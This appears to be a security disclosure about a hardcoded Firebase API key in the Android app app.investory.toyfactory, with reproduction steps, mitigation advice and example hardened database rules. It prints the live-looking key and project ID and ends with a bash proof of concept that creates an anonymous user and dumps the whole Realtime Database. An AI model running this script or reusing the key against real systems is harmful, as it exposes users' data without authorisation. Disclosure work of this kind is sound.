Description

In the Android application app.investory.toyfactory version 1.5.5, a hardcoded Google Firebase API key was discovered in assets/google-services-desktop.json. An attacker can extract it and use it to anonymously authenticate with Firebase Identity Toolkit. Once an anonymous user is created, the resulting ID token can be used to query the associated Firebase Realtime Database. Depending on the database security rules, this may grant unauthorized read access to sensitive user data.

Steps to Reproduce

  1. Decompile the APK using jadx.
  2. Locate the Firebase API key in resources/assets/google-services-desktop.json:
{
  "project_info": {
    "project_id": "investory-27020",
    ...
  },
  "client": [
    {
      ...
      "api_key": [
        {
          "current_key": "AIzaSyCJaY1wcAEb2IiGByW3PjOHaVIuVxe4Sdk"
        }
      ]
      ...
    }
  ]
}
  3. Use the extracted API key to create an anonymous user via the Firebase Identity Toolkit REST API.

The response includes an idToken, refreshToken, and localId (user ID).

  4. Use the obtained idToken as the auth parameter to access the Firebase Realtime Database.

Because the database security rules allow anonymous read access, the response will contain the stored data.

Video Proof of Concept

poc_app_investory_toyfactory (2).gif

The script successfully obtains a Firebase idToken and retrieves the entire database content, confirming unauthorized access to sensitive user data.

Principle

Firebase API keys identify your project to Firebase services. While not designed to be secrets, they allow anyone to call Firebase Authentication endpoints to create anonymous users. The resulting ID token can then access other Firebase services like Realtime Database. If security rules are misconfigured, an attacker with the key can read or write all data accessible to anonymous users.

Mitigation

Remove hardcoded API keys from client apps. Implement strict Firebase Security Rules based on user authentication and custom claims, not just token presence. Move sensitive operations to a backend server with fine-grained access control. Limit anonymous user permissions to the minimum required, and regularly audit Firebase project settings and rules.
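As an added illustration of the rules-based mitigation (not part of the original report), the Realtime Database rules below replace a token-presence check such as ".read": "auth != null" (which the anonymous sign-up satisfies) with rules that scope each record to its owner and reject tokens issued by the anonymous provider. The users/$uid layout and the admin custom claim are assumptions for this example.

```json
{
  "rules": {
    // Root default: deny everything. A bare "auth != null" at this level
    // would be satisfied by the anonymous account created with the leaked key.
    ".read": false,
    ".write": false,

    "users": {
      "$uid": {
        // Owner-only access, and only when the ID token was issued for a
        // non-anonymous sign-in (password, google.com, phone, ...).
        // auth.token.firebase.sign_in_provider is set by Firebase Authentication
        // on every ID token, so an anonymous user is rejected here.
        ".read": "auth != null && auth.uid === $uid && auth.token.firebase.sign_in_provider !== 'anonymous'",
        ".write": "auth != null && auth.uid === $uid && auth.token.firebase.sign_in_provider !== 'anonymous'"
      }
    },

    "admin": {
      // Assumed custom claim 'admin', set only by a trusted backend through the
      // Admin SDK; token presence alone never grants access to this subtree.
      ".read": "auth != null && auth.token.admin === true",
      ".write": "auth != null && auth.token.admin === true"
    }
  }
}
```

Read and write grants cascade downwards in Realtime Database rules, so a permissive rule near the root cannot be tightened at a deeper path; keep the root deny and grant access only at the narrowest path that needs it.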

PoC

#!/bin/bash

API_KEY="AIzaSyCJaY1wcAEb2IiGByW3PjOHaVIuVxe4Sdk"

# Create an anonymous user with the extracted key (Identity Toolkit signUp, no credentials)
response=$(curl -s -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=$API_KEY" \
     -H "Content-Type: application/json" \
     -d '{"returnSecureToken": true}')

# Extract idToken from the JSON response using Python
idToken=$(python3 -c "
import sys, json
try:
    data = json.loads(sys.stdin.read())
    print(data['idToken'])
except Exception as e:
    print('ERROR', e)
    sys.exit(1)
" <<< "$response")

if [[ "$idToken" == ERROR* ]]; then
    echo "Failed to obtain idToken. Response: $response"
    exit 1
fi

echo "Successfully obtained idToken: $idToken"
# Query the Realtime Database root with the anonymous user's token
curl -v "https://investory-27020.firebaseio.com/.json?auth=$idToken"

Impact